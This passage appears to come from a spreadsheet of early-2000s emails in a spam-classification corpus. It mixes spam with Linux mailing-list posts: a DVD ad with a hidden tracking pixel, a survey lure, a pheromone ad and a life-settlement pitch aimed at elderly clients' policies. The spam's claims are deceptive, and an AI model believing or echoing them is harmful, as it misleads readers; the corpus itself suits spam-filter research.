 &lt;td align="right"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/se2/email/online_ad/left_curve_new.gif" width="6" height="15" alt=""&gt;&lt;/td&gt;
 &lt;td bgcolor="#6666cc" width="215" align="center"&gt;&lt;font size="-2" face="verdana, arial, sans-serif" color="#ffffff"&gt;&lt;B&gt;MORE TITLES&lt;/B&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td align="left"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/se2/email/online_ad/right_curve_new.gif" width="6" height="15" alt=""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="511" bgcolor="#ffffff"&gt;
 &lt;tr&gt;
 &lt;td bgcolor="#6666cc" rowspan="2"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="1" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td width="9" bgcolor="#6666cc"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="9" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td width="491" bgcolor="#6666cc"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="491" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td width="9" bgcolor="#6666cc"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="9" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td bgcolor="#6666cc" rowspan="2"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="1" height="1" alt=""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="3"&gt;
 	&lt;table cellpadding="10" cellspacing="0" border="0" width="511" bgcolor="#ffffff"&gt;
 	&lt;tr&gt;
 	&lt;td colspan="3"&gt;&lt;font size="-2" face="verdana, arial, sans-serif"&gt;Choose from these many more hot releases at chdvd.com!&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 	&lt;td valign="top"&gt;
 		&lt;table cellpadding="10" cellspacing="0" border="0" width="120" bgcolor="#ffffff"&gt;
 		&lt;tr&gt;
 		&lt;td&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;img HEIGHT="140" WIDTH="100" src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/content/art/dvd/cover/02/70/027094_dba_dtl_01.jpg" align="left" hspace="2" vspace="2" border=0 alt="Click for Detail"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;td valign="top"&gt;&lt;font size="-2" face="verdana, arial, sans-serif" &gt;
 			&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;The Others&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 	&lt;BR&gt;&lt;BR&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;Training Day&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 	&lt;BR&gt;&lt;BR&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;Pearl Harbor (2001) 60th Anniversary Commemorative Edition&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 	&lt;BR&gt;&lt;BR&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;Moulin Rouge (2001)&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 	&lt;BR&gt;&lt;BR&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;Braveheart&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;
 		&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 		&lt;td&gt;&amp;nbsp;&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;/td&gt;
 	&lt;td valign="top"&gt;
 		&lt;table cellpadding="10" cellspacing="0" border="0" width="120" bgcolor="#ffffff"&gt;
 		&lt;tr&gt;
 		&lt;td&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;img HEIGHT="140" WIDTH="100" src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/content/art/dvd/cover/02/64/026476_dba_dtl_01.jpg" align="left" hspace="2" vspace="2" border=0 alt="Click for Detail"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;td valign="top"&gt;&lt;font size="-2" face="verdana, arial, sans-serif"&gt;
 			&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;Shrek Special Edition&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 	&lt;BR&gt;&lt;BR&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;Spy Game&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 	&lt;BR&gt;&lt;BR&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;American Pie 2 Collector's Edition (Unrated)&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 	&lt;BR&gt;&lt;BR&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;Gone In 60 Seconds &lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 	&lt;BR&gt;&lt;BR&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;The Green Mile&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;
 		&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 		&lt;td&gt;&lt;font size="-2" face="verdana, arial, sans-serif"&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;More Hits&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;
 		&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;/td&gt;
 	&lt;td valign="top"&gt;
 		&lt;table cellpadding="10" cellspacing="0" border="0" width="120" bgcolor="#ffffff"&gt;
 		&lt;tr&gt;
 		&lt;td&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;img HEIGHT="140" WIDTH="100" src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/content/art/dvd/cover/02/62/026224_dba_dtl_01.jpg" align="left" hspace="2" vspace="2" border=0 alt="Click for Detail"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;td valign="top"&gt;&lt;font size="-2" face="verdana, arial, sans-serif"&gt;
 			&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;Matrix&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 	&lt;BR&gt;&lt;BR&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;Fast and the Furious (2001) Collector's Edition&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 	&lt;BR&gt;&lt;BR&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;Serendipity&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 	&lt;BR&gt;&lt;BR&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;Titanic&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 	&lt;BR&gt;&lt;BR&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;Saving Private Ryan Special Limited Edition&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;
 		&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 		&lt;td&gt;&amp;nbsp;&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td bgcolor="#6666cc" width="10" colspan="2"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="10" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td bgcolor="#ffffff" width="491" valign="top"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="491" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td bgcolor="#6666cc" width="10" colspan="2"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="10" height="1" alt=""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;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src="http://www.salealerts.com/dot.gif" width=1 border=0&gt;
 &lt;/TD&gt;
     &lt;TD vAlign=top&gt;&lt;I&gt;&lt;/I&gt;&lt;FONT face=Verdana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href="http://www.frugaljoe.com/unsubscribe.php?eid=\~moc.cnietonten^^mj\~1754388\~12a1"&gt;here &lt;/a&gt;or
 cut and paste the following link into a web browser:&lt;br&gt;
  http://www.frugaljoe.com/unsubscribe.php?eid=\~moc.cnietonten^^mj\~1754388\~12a1
 &lt;br&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;IMG height=20
 src="http://www.salealerts.com/dot.gif" 
       width=459 border=0&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 &lt;img src="http://www.330w.com/open/open.php?eid=zzzz@spamassassin.taint.org&amp;oid=DVD-09242002-HTML&amp;custid=frugaljoe" border=0 height=0 width=0&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;p&gt;We thank you for just a moment of your time.  NextResearch is inviting you to join a panel of consumer electronics users now being created to help manufacturers, network programmers, and entertainment companies shape their future offerings.  In exchange for your willingness to participate, there will be prizes and incentives awarded. ALL CONTACT INFORMATION WILL BE HELD IN STRICTEST CONFIDENCE AND WE WILL NEVER TRY TO SELL YOU ANYTHING.  You will be able to opt-out of the panel at any time.&lt;/p&gt; 
 					Please click here &lt;a href=http://65.19.137.17/nextresearch/NR.htm&gt;http://65.19.137.17/nextresearch/NR.htm&lt;/a&gt; if you would like to participate in your first survey and earn a chance to win one of 25 new Digital Video Recorders being awarded in September!  (You do not have to join the panel to participate in this survey.) This is a national market research program conducted with the highest ethical standards. Feel free to contact program director, Jennifer Choate at &lt;a href=mailto:jchoate@newyork.com&gt;jchoate@newyork.com&lt;/a&gt; with any questions.  To unsubscribe from this list, simply reply to this email with subject "UNSUBSCRIBE" to be removed from future invitations to participate. 
 					&lt;p&gt;Thank you again for your consideration,&lt;/p&gt; 
                     &lt;p&gt;NextResearch&lt;/p&gt; 
 					&lt;/p&gt; 
 					&lt;p&gt;Link to survey: &lt;a href=http://65.19.137.17/nextresearch/nr.htm&gt;http://65.19.137.17/nextresearch/nr.htm&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] Re: removing lilo
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;===== Original Message From deedsmis@aculink.net, ilug@linux.ie =====
 &gt;"Hunt, Bryan" stated the following:
 &gt;&gt;
 &gt;&gt; choose the repair option when installing windows nt/2000/whatever
 &gt;
 &gt;What is the "repair option"?
 &gt;
 If u choose Setup NT from the installation CD it will reboot your system
 and give the option of repairing an existing installation when it reboots.
 I did this the other night, with the check MBR option, but it didn't 
 overwrite the MBR like it should (apparently). Either my disk is completely
 shagged or i'm missing something.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">I need to experiment with ripping out all my "sophisticated" cut/paste
 code.  This is mostly historical accident from dealing with very early
 versions of Tk, and the emacs "cutbuffer", and other wierd junk.
 You can, too, by hacking upon seditBind.tcl appropriately.
 &gt;&gt;&gt;Hal DeVore said:
  &gt; 
  &gt; 
  &gt; &gt;&gt;&gt;&gt;&gt; On Fri, 13 Sep 2002, "Tony" == Tony Nugent wrote:
  &gt; 
  &gt;   Tony&gt; I can't even mark text in an exmh message window and then
  &gt;   Tony&gt; paste it into a terminal window, the cut buffer seems to
  &gt;   Tony&gt; be completely empty (and its previous contents are no
  &gt;   Tony&gt; longer there either).
  &gt; 
  &gt; Brent confessed recently that he had tried to subvert the X
  &gt; model(s) of copy and paste.  Not in those words... but that
  &gt; was how I read it. ;)
  &gt; 
  &gt; I have a lot of trouble copying and pasting from or to exmh 
  &gt; across a VNC link (from things in the vncviewer to things not in 
  &gt; it and vice versa).  As long as I stick to apps being "normally" 
  &gt; displayed on my X server I don't have much of a problem.
  &gt; 
  &gt; My recollection from my X programming days is that the X model,
  &gt; like everything in X, is more complex than the human brain can
  &gt; handle.  It also is very different from the MS-Windows model.
  &gt; And I get the feeling that Tk tries to "unify" those two models
  &gt; and fails.  Not sure what the exmh-specific contribution to the 
  &gt; confusion is, frankly.
  &gt; 
  &gt; --Hal
  &gt; 
  &gt; 
  &gt; 
  &gt; 
  &gt; _______________________________________________
  &gt; Exmh-users mailing list
  &gt; Exmh-users@redhat.com
  &gt; https://listman.redhat.com/mailman/listinfo/exmh-users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</si>
  <si>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Attract Women and Men               NFT
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;FONT  COLOR=3D"#ff00ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: =
 #ffffff" SIZE=3D3 PTSIZE=3D12&gt; &amp;nbsp;&lt;B&gt;&lt;!--#rotate&gt;Terific!!   Instantly =
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ff80ff" style=3D"BACKGROUND-COLOR=
 : #ff80ff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt;S e x u a l l y Attract&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff00ff" BACK=3D"=
 #ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D=
 "SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt; with nature's secret weapon... Pher=
 omones!! &amp;nbsp;&amp;nbsp;*****&lt;BR&gt;
 &lt;BR&gt;
 Invisible and undetectable, when unknowingly inhaled, Pheromone Concentrat=
 e  unblocks all restraints and releases the raw  animal s e x drive!&lt;BR&gt;
 &lt;BR&gt;
 This is the strongest concentration of &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BAC=
 K=3D"#ff80ff" style=3D"BACKGROUND-COLOR: #ff80ff" SIZE=3D3 PTSIZE=3D12 FAM=
 ILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;HUMAN Pheromones&lt;/FONT&gt;&lt;/FONT&gt;=
 &lt;FONT  COLOR=3D"#ff00ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffff=
 ff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;, =
 allowed by law, in an essential oil base.&lt;BR&gt;
 &lt;BR&gt;
 Available in formulas for both men and women.&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 To learn more: &lt;/FONT&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"B=
 ACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D=
 "Arial" LANG=3D"0"&gt;&lt;/B&gt;  &lt;A HREF=3D"http://217.106.55.97/"&gt;CLICK HERE TO A=
 TTRACT&lt;/A&gt; &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR=
 : #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt;********&lt;BR&gt;
 To be deleted from our mailing list please email us at jane98@firelord.com=
  with "delete" in the sub-line.&lt;/FONT&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D"#ff=
 ffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"S=
 ANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;BR&gt;
 &lt;BR&gt;
 1.5.5.8&lt;BR&gt;
 &lt;BR&gt;
 {%IP=3D55.76.182.57%}&lt;BR&gt;
 &lt;BR&gt;TO 48 5-19 C4 P
 &lt;BR&gt;
 &lt;br&gt;{%RAND%}
 &lt;BR&gt;
 &lt;BR&gt;&lt;/FONT&gt;
 &lt;/FONT&gt;&lt;/HTML&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;hasgdhjgasdgas=
 dkasdasjdg
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fw: Everybody (null)... again!
</t>
  </si>
  <si>
    <t xml:space="preserve">FYI..
 ----- Original Message -----
 From: "Bill Nottingham" &lt;notting@spamassassin.taint.org&gt;
 To: &lt;limbo-list@spamassassin.taint.org&gt;
 Sent: Monday, August 19, 2002 10:40 AM
 Subject: Everybody (null)... again!
 &gt; The (null) beta of Red Hat Linux has been updated. New in this release
 include:
 &gt;
 &gt; - gcc-3.2 - gcc-3.2 allows for better ABI compatibility going forward.
 &gt;   Note that C++ apps compiled on the first beta will not run on this beta.
 &gt; - lots-o-bugfixes
 &gt;
 &gt; Please report issues via Bugzilla at
 http://bugzilla.redhat.com/bugzilla/ -
 &gt; choose 'Red Hat Public Beta' as the product, and 'null' as the version.
 &gt;
 &gt; To discuss (null), send mail to Limbo-list-request@redhat.com with
 &gt; 'subscribe' in the subject line. You can leave the body empty.
 &gt;
 &gt; The updated (null) is at ftp.redhat.com, and the following mirrors:
 &gt;
 &gt;  North America:
 &gt;    * ftp://linux.nssl.noaa.gov/pub/linux/redhat/linux/beta/null/
 &gt;    * ftp://ftp.shuttleamerica.com/pub/mirrors/redhat/linux/beta/null/
 &gt;      (also rsync access)
 &gt;    * ftp://redhat.dulug.duke.edu/pub/redhat/linux/beta/null/
 &gt;      (http and also rsync access)
 &gt;    * ftp://mirror.hiwaay.net/redhat/redhat/linux/beta/null/
 &gt;    * ftp://mirror.netglobalis.net/pub/redhat-beta/null/
 &gt;      (also http access)
 &gt;    * ftp://ftp.gtlib.gatech.edu/pub/mirros/ftp.redhat.com/linux/beta/null/
 &gt;  South America:
 &gt;    * ftp://ftp.tecnoera.com/
 &gt;  Europe:
 &gt;    * ftp://ftp.uni-bayreuth.de/pub/redhat/linux/beta/null/
 &gt;    * ftp://alviss.et.tudelft.nl/pub/redhat/beta/null/
 &gt;    *
 ftp://sunsite.mff.cuni.cz/MIRRORS/ftp.redhat.com/redhat/linux/beta/null/
 &gt;    *
 ftp://ftp.cs.huji.ac.il/mirror/linux/redhat/ftp/redhat/linux/beta/null/
 &gt;    * ftp://ftp.funet.fi/pub/mirrors/ftp.redhat.com/redhat/linux/beta/null/
 &gt;    * ftp://ftp-stud.fht-esslingen.de/pub/redhat/linux/beta/null/
 &gt;  Asia/Pacific:
 &gt;    * ftp://videl.ics.hawaii.edu/mirrors/redhat/linux/beta/null/
 &gt;    * ftp://planetmirror.com/pub/redhat/linux/beta/null/
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: One Sale - Three Commission Streams
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_C16F3_01C260C3.2978B160
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  An Additional Income Stream
  from your current book of business!
   =09
  	  	 	 =09
  	 Agent Commission:
 $92,000=20
  Client:
  87-year-old male
  82-Year-old female
  Result:
  $2,300,000 second to die
  policy, minimal cash value.  Policy was no longer
  required. Insured utilized a
  life settlement and received
  $300,000. Agent Commission:
 $30,000=20
  Client:
  70-year-old male with health complications
  Result:
  $1,000,000 policy with small
  cash value. Insured utilized
  a life settlement and
  received $300,000. Agent Commission:
 $90,000=20
  Client:
  89-year-old female
  Result:
  $2,000,000 policy with an
  annual premium of $110,000.
  Policy expires at age 95.
  Insured utilized a life
  settlement and received
  $325,000.=20
  	  	 	 =09
 =20
 Multiple opportunities to earn commissions
 from one strategy!=20
 	If any of your elderly client=92s health, personal, or financial
 needs or circumstances have changed since the original life policy was
 issued you have the opportunity to create an additional income stream
 with Life Settlements:
  ? Earn a referral fee from a life settlement transaction.
 ? Trailer commission on the policy for the agent of record.
 ? Earn investment or annuity commissions from the capital created by=20
    the life settlement transaction.
 ? Earn a commission on new life insurance products that better suit=20
    your client=92s current needs.
 ? Earn a commission on the conversion if the policy being considered
    is a term product.
 ?Earn additional commissions for referring other agents or agencies
    to The Life Settlement Alliance.=20
 =20
 Call today for more information!
  800-871-9440=97 or =97=20
 Please fill out the form below for more information	=20
 Name:	 	  =09
 E-mail:	 	=20
 Phone:	 	=20
 City:	 	 State:	 	=20
  	    =09
 =20
 The Life Settlement Alliance &lt;http://www.lsalliance.com&gt; 	=20
 We don't want anyone to receive our mailings who does not wish to. This
 is professional communication sent to insurance professionals. To be
 removed from this mailing list, DO NOT REPLY to this message. Instead,
 go here: http://www.Insuranceiq.com/optout
 &lt;http://www.Insuranceiq.com/optout/&gt;=20
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt; =20
 ------=_NextPart_000_C16F3_01C260C3.2978B160
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;One Sale - Three Commission Streams&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;
 &lt;table width=3D"550" border=3D"1" align=3D"center" cellpadding=3D"0" =
 cellspacing=3D"0" bordercolor=3D"#000000" bgcolor=3D"#FFFFFF"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;
 			&lt;img src=3D"http://iiq.us/Images/vbi/lsa/20020730-101a.gif" alt=3D"An =
 Additional Income Stream" width=3D"550" height=3D"39"&gt;&lt;br&gt;
 			&lt;img src=3D"http://iiq.us/Images/vbi/lsa/20020730-102a.gif" =
 alt=3D"from your current book of business!" width=3D"550" =
 height=3D"43"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/Images/vbi/lsa/20020730-103a.jpg" =
 width=3D"275" height=3D"206"&gt;&lt;img =
 src=3D"http://iiq.us/Images/vbi/lsa/20020730-104a.jpg" width=3D"275" =
 height=3D"206"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td&gt;
       &lt;table width=3D"100%" cellpadding=3D"0" cellspacing=3D"0" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"5"&gt;&amp;nbsp;&lt;/td&gt;
           &lt;td width=3D"180"&gt;&lt;img =
 src=3D"http://iiq.us/Images/vbi/lsa/20020730-201a.gif" width=3D"180" =
 height=3D"43"&gt;&lt;/td&gt;
           &lt;td width=3D"180"&gt;&lt;img =
 src=3D"http://iiq.us/Images/vbi/lsa/20020730-201b.gif" width=3D"180" =
 height=3D"43"&gt;&lt;/td&gt;
           &lt;td width=3D"180"&gt;&lt;img =
 src=3D"http://iiq.us/Images/vbi/lsa/20020730-201c.gif" width=3D"180" =
 height=3D"43"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&amp;nbsp;&lt;/td&gt;
           &lt;td valign=3D"top" =
 background=3D"http://iiq.us/Images/vbi/lsa/20020730-203.gif"&gt;
 						&lt;font size=3D"2"&gt;=20
 							&lt;center&gt;
 								&lt;b&gt;Agent Commission:&lt;br&gt;
 								&lt;font color=3D"#FF0000" size=3D"3"&gt;$92,000&lt;/font&gt;&lt;/b&gt;=20
 							&lt;/center&gt;
 							&lt;b&gt;&lt;i&gt;&amp;nbsp;Client:&lt;/i&gt;&lt;/b&gt;&lt;br&gt;
 							&amp;nbsp;87-year-old male&lt;br&gt;
 							&amp;nbsp;82-Year-old female&lt;br&gt;
 							&lt;br&gt;
 							&lt;i&gt;&lt;b&gt;&amp;nbsp;Result:&lt;/b&gt;&lt;/i&gt;&lt;br&gt;
 							&amp;nbsp;$2,300,000 second to die&lt;br&gt;
 							&amp;nbsp;policy, minimal cash value. &amp;nbsp;Policy was no longer&lt;br&gt;
 							&amp;nbsp;required.&amp;nbsp;Insured utilized a&lt;br&gt;
 							&amp;nbsp;life settlement and received&lt;br&gt;
 							&amp;nbsp;$300,000.
 						&lt;/font&gt;
 					&lt;/td&gt;
           &lt;td valign=3D"top" =
 background=3D"http://iiq.us/Images/vbi/lsa/20020730-203.gif"&gt;
 						&lt;font size=3D"2"&gt;
 							&lt;center&gt;
 								&lt;b&gt;Agent Commission:&lt;br&gt;
 								&lt;font color=3D"#FF0000" size=3D"3"&gt;$30,000&lt;/font&gt;&lt;/b&gt;
 							&lt;/center&gt;
 							&lt;b&gt;&lt;i&gt;&amp;nbsp;Client:&lt;/i&gt;&lt;/b&gt;&lt;br&gt;
 							&amp;nbsp;70-year-old male with health complications&lt;br&gt;
 							&lt;br&gt;
 							&lt;i&gt;&lt;b&gt;&amp;nbsp;Result:&lt;/b&gt;&lt;/i&gt;&lt;br&gt;
 							&amp;nbsp;$1,000,000 policy with small&lt;br&gt;
 							&amp;nbsp;cash value. Insured utilized&lt;br&gt;
 							&amp;nbsp;a life settlement and&lt;br&gt;
 							&amp;nbsp;received $300,000.
 						&lt;/font&gt;
 					&lt;/td&gt;
           &lt;td valign=3D"top" =
 background=3D"http://iiq.us/Images/vbi/lsa/20020730-203.gif"&gt;=20
 						&lt;font size=3D"2"&gt;
 							&lt;center&gt;
 								&lt;b&gt;Agent Commission:&lt;br&gt;
 								&lt;font color=3D"#FF0000" size=3D"3"&gt;$90,000&lt;/font&gt;&lt;/b&gt;
 							&lt;/center&gt;&lt;br&gt;
 							&lt;b&gt;&lt;i&gt;&amp;nbsp;Client:&lt;/i&gt;&lt;/b&gt;&lt;br&gt;
 							&amp;nbsp;89-year-old female&lt;br&gt;
 							&lt;br&gt;
 							&lt;i&gt;&lt;b&gt;&amp;nbsp;Result:&lt;/b&gt;&lt;/i&gt;&lt;br&gt;
 							&amp;nbsp;$2,000,000 policy with an&lt;br&gt;
 							&amp;nbsp;annual premium of $110,000.&lt;br&gt;
 							&amp;nbsp;Policy expires at age 95.&lt;br&gt;
 							&amp;nbsp;Insured utilized a life&lt;br&gt;
 							&amp;nbsp;settlement and received&lt;br&gt;
 							&amp;nbsp;$325,000.
 						&lt;/font&gt;
 					&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&amp;nbsp;&lt;/td&gt;
           &lt;td&gt;&lt;img src=3D"http://iiq.us/Images/vbi/lsa/20020730-205.gif" =
 width=3D"180" height=3D"38"&gt;&lt;/td&gt;
           &lt;td&gt;&lt;img src=3D"http://iiq.us/Images/vbi/lsa/20020730-205.gif" =
 width=3D"180" height=3D"38"&gt;&lt;/td&gt;
           &lt;td&gt;&lt;img src=3D"http://iiq.us/Images/vbi/lsa/20020730-205.gif" =
